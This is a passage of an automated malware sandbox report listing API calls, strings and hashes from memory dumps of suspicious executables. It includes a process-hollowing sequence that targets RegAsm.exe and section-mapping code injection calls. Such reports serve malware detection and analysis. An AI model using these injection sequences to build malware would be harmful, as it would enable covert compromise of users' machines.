Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2164062503c7e343de3ca5abc682516f58443437f4f9e271b21e2eb327127d3e
Instruction ID: 345392e5678fd56a2324cb19d8fc2a583d627001275e8fc425be45e881facd78
Opcode Fuzzy Hash: 2164062503c7e343de3ca5abc682516f58443437f4f9e271b21e2eb327127d3e
Instruction Fuzzy Hash: BC31CBB4D012189FCF10CFA9D980AEEFBB0BB49320F14942AE815B7300C775A941CFA4

Function 0175EDE8 Relevance: 1.3, APIs: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0175EE89

Memory Dump Source

Source File: 0000000A.00000002.1866675700.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1750000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5de779cc4db63a3cfb45eee67287fde5d3bdc950a4c521b77fa64534e2815468
Instruction ID: 01e5a24081efcd9931f09b3bd9424ff158aba6a1dd9084bc82262835950489ac
Opcode Fuzzy Hash: 5de779cc4db63a3cfb45eee67287fde5d3bdc950a4c521b77fa64534e2815468
Instruction Fuzzy Hash: DD3174B9D042589FDF10CFA9D984A9EFBF5BB09310F10902AE818B7310D775AA45CF69

Function 016BD01C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1837810348.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_16bd000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8e7b0e29cfa1196211235a848c145d2d306e80f49b56c6cc279d687fd8d0253
Instruction ID: 57b509d70cc31a29f9a225f3def91eb9e952032b0a6d6ef799f9a5b46eb31149
Opcode Fuzzy Hash: d8e7b0e29cfa1196211235a848c145d2d306e80f49b56c6cc279d687fd8d0253
Instruction Fuzzy Hash: C8210071504244DFDB15DF54D9C4B66BBA5FB88328F248569E9090F242C336D487CBA2

Function 016BD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1837810348.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_16bd000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e94d3bbed420b0e4692876a762ca642a2fb715ffebdd4ecf881764abf235af7
Instruction ID: 8a824225b26baff55c5c201f6b4601909642a78a4ba4defc708f92ae6a068fb6
Opcode Fuzzy Hash: 4e94d3bbed420b0e4692876a762ca642a2fb715ffebdd4ecf881764abf235af7
Instruction Fuzzy Hash: 9921AF754093808FDB13CF24D9D4B56BF71EB86214F2881DAD8448F663C33A944ACB62

Non-executed Functions

Function 0175DEC8 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1866675700.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1750000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc02b5b708da52c800c8a6eb40f705f458c329436f69c4e001f2f55d68f1877b
Instruction ID: 53a0c3ca48b7ca4c1f4b049f1b6e7e0653d1ce8f3d524124694afdf663a08851
Opcode Fuzzy Hash: dc02b5b708da52c800c8a6eb40f705f458c329436f69c4e001f2f55d68f1877b
Instruction Fuzzy Hash: 4B41E0B4D043489FDB64CFA9D884B9DFBF1BB09300F249029E824AB290D7B49985CF45

Analysis Process: LeVSNPB9FLpXmtLG7mcICpEf.exePID: 7948, Parent PID: 7504COMMON

Execution Graph

Execution Coverage:	30.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	30
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 022621A5 Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02262117,02262107), ref: 02262314
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02262327
Wow64GetThreadContext.KERNEL32(000003C4,00000000), ref: 02262345
ReadProcessMemory.KERNELBASE(000003C8,?,0226215B,00000004,00000000), ref: 02262369
VirtualAllocEx.KERNELBASE(000003C8,?,?,00003000,00000040), ref: 02262394
TerminateProcess.KERNELBASE(000003C8,00000000), ref: 022623B3
WriteProcessMemory.KERNELBASE(000003C8,00000000,?,?,00000000,?), ref: 022623EC
WriteProcessMemory.KERNELBASE(000003C8,00400000,?,?,00000000,?,00000028), ref: 02262437
WriteProcessMemory.KERNELBASE(000003C8,?,?,00000004,00000000), ref: 02262475
Wow64SetThreadContext.KERNEL32(000003C4,05080000), ref: 022624B1
ResumeThread.KERNELBASE(000003C4), ref: 022624C0

Strings

ress, xrefs: 0226222F
GetP, xrefs: 02262227
Load, xrefs: 022621E3
ResumeThread, xrefs: 022622E1
TerminateProcess, xrefs: 022623A3
ReadProcessMemory, xrefs: 02262292
SetThreadContext, xrefs: 022622CB
CreateProcessA, xrefs: 02262259
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 02262313
VirtualAlloc, xrefs: 0226226C
WriteProcessMemory, xrefs: 022622B8
VirtualAllocEx, xrefs: 022622A5
GetThreadContext, xrefs: 0226227F
aryA, xrefs: 022621EB

Memory Dump Source

Source File: 0000000B.00000002.1784243230.0000000002262000.00000040.00000800.00020000.00000000.sdmp, Offset: 02262000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2262000_LeVSNPB9FLpXmtLG7mcICpEf.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-1257834847
Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction ID: 0a8baee4e9a57bf254751a92303187054c3b440f0e67beba57c7e5f36de2d7ba
Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction Fuzzy Hash: BCB1E67260024AAFDB60CFA8CC80BDA77A5FF88714F158524EA0CAB345D774FA51CB94

Function 00930BD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 293
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03263590,?,00000001,0000012C,?,?,?,00000000,00000000,?,00930A73,00000001,00000040), ref: 00930FD9

Strings

<1i;, xrefs: 00930DCC
&S!, xrefs: 00930C67

Memory Dump Source

Source File: 0000000B.00000002.1781823400.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_930000_LeVSNPB9FLpXmtLG7mcICpEf.jbxd

Similarity

API ID: ProtectVirtual
String ID: &S!$<1i;
API String ID: 544645111-1770337207
Opcode ID: d7e4a3900353f1f0c4c7db1b25a2ac1dd2417cf7fd8ebb819ba5663978ab6078
Instruction ID: 31c577e698362fab932c750156913685c9d63bb873f0799c896d04a1344b8ec1
Opcode Fuzzy Hash: d7e4a3900353f1f0c4c7db1b25a2ac1dd2417cf7fd8ebb819ba5663978ab6078
Instruction Fuzzy Hash: DFC19E70A042599FCB21CFA9C9906EDFBF1BF88310F648599E459EB246C334AD41CFA4

Function 00930500 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03263590,?,00000001,0000012C,?,?,?,00000000,00000000,?,00930A73,00000001,00000040), ref: 00930FD9

Memory Dump Source

Source File: 0000000B.00000002.1781823400.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_930000_LeVSNPB9FLpXmtLG7mcICpEf.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3b92ff270f7286e197b1ca75446579ed6a3fc41a1e47b01e59fbf39bcca28fb3
Instruction ID: 7cee0184b8ea40df9bd4537680bf29333ecaa6a4c00d503580a767d4d45e5737
Opcode Fuzzy Hash: 3b92ff270f7286e197b1ca75446579ed6a3fc41a1e47b01e59fbf39bcca28fb3
Instruction Fuzzy Hash: C221E0B590121DAFCB10DF9AC884BDEFBB4FB48310F10812AE918A7240D3B4A954CFA5

Function 007DD059 Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1726557542.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7dd000_LeVSNPB9FLpXmtLG7mcICpEf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c78ecd27acf592b3ec3270ed154a779d59c5b44ca811e4ca4df5263a4a1b21f8
Instruction ID: ef46f7827560ded22e754c5fe5a2d7b9852d725cdbd17d190f3f6eefe3bb8d2d
Opcode Fuzzy Hash: c78ecd27acf592b3ec3270ed154a779d59c5b44ca811e4ca4df5263a4a1b21f8
Instruction Fuzzy Hash: 6C01A271108344AFE7309A26DC84B67BBE8DF81324F18C46BED094A386C37D9C45DAB2

Function 007DD058 Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1726557542.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7dd000_LeVSNPB9FLpXmtLG7mcICpEf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07d6fa27462ce703370ba9bfc14fbc12d1a76eb8ea93257fed4e3d01e0b2be64
Instruction ID: 8b3f23c60ace79b65f67d60e0503d572ba86599030a30b3741dff8d9dc426748
Opcode Fuzzy Hash: 07d6fa27462ce703370ba9bfc14fbc12d1a76eb8ea93257fed4e3d01e0b2be64
Instruction Fuzzy Hash: 45F06271408344AEE7208A16D884B66FFE8EF91734F18C45BED484B286C3799C44CAB1

Analysis Process: pZhQ7nTCR9R3A5r5QIQYLapT.exePID: 7956, Parent PID: 7504COMMON

Executed Functions

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 7e1873f1d77be6ac03ef9cfc7342e6364087b58188b66d07b59adfe636bbab3f
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 7e1873f1d77be6ac03ef9cfc7342e6364087b58188b66d07b59adfe636bbab3f
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 026D04FA Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 026D0522
Module32First.KERNEL32(00000000,00000224), ref: 026D0542

Memory Dump Source

Source File: 0000000C.00000002.2521250191.00000000026BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 026BE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_26be000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: f191741fb068a9acdc578911e9c0e9a90ae51c0a1fc7b4e8391b46e5eccf568d
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: A7F096359007186FD7203FF9AD8CBAE77E8AF49728F100528EA46911C0DB70E8458A61

Function 0260003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0260024D

Strings

cess, xrefs: 0260018D
kernel32.dll, xrefs: 0260008F, 02600095

Memory Dump Source

Source File: 0000000C.00000002.2511522701.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Offset: 02600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2600000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 38970583c4b0d8f2029b469f18cb552b7e2e82059de27bbee9bf2002265f9962
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: ED525974A01229DFDB64CF58C984BADBBB1BF09304F1480E9E54DAB391DB30AA95DF14

Function 02600E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02600223,?,?), ref: 02600E19
SetErrorMode.KERNELBASE(00000000,?,?,02600223,?,?), ref: 02600E1E

Memory Dump Source

Source File: 0000000C.00000002.2511522701.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Offset: 02600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2600000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: f82a6827768bfc8aed8dcca7ece3f46dddec10a89304653ab261c17e36a96948
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 47D01232245228B7DB002A94DC09BCEBB1CDF09BA6F008021FB0DE9180CBB09A4046EA

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 026D01B9 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

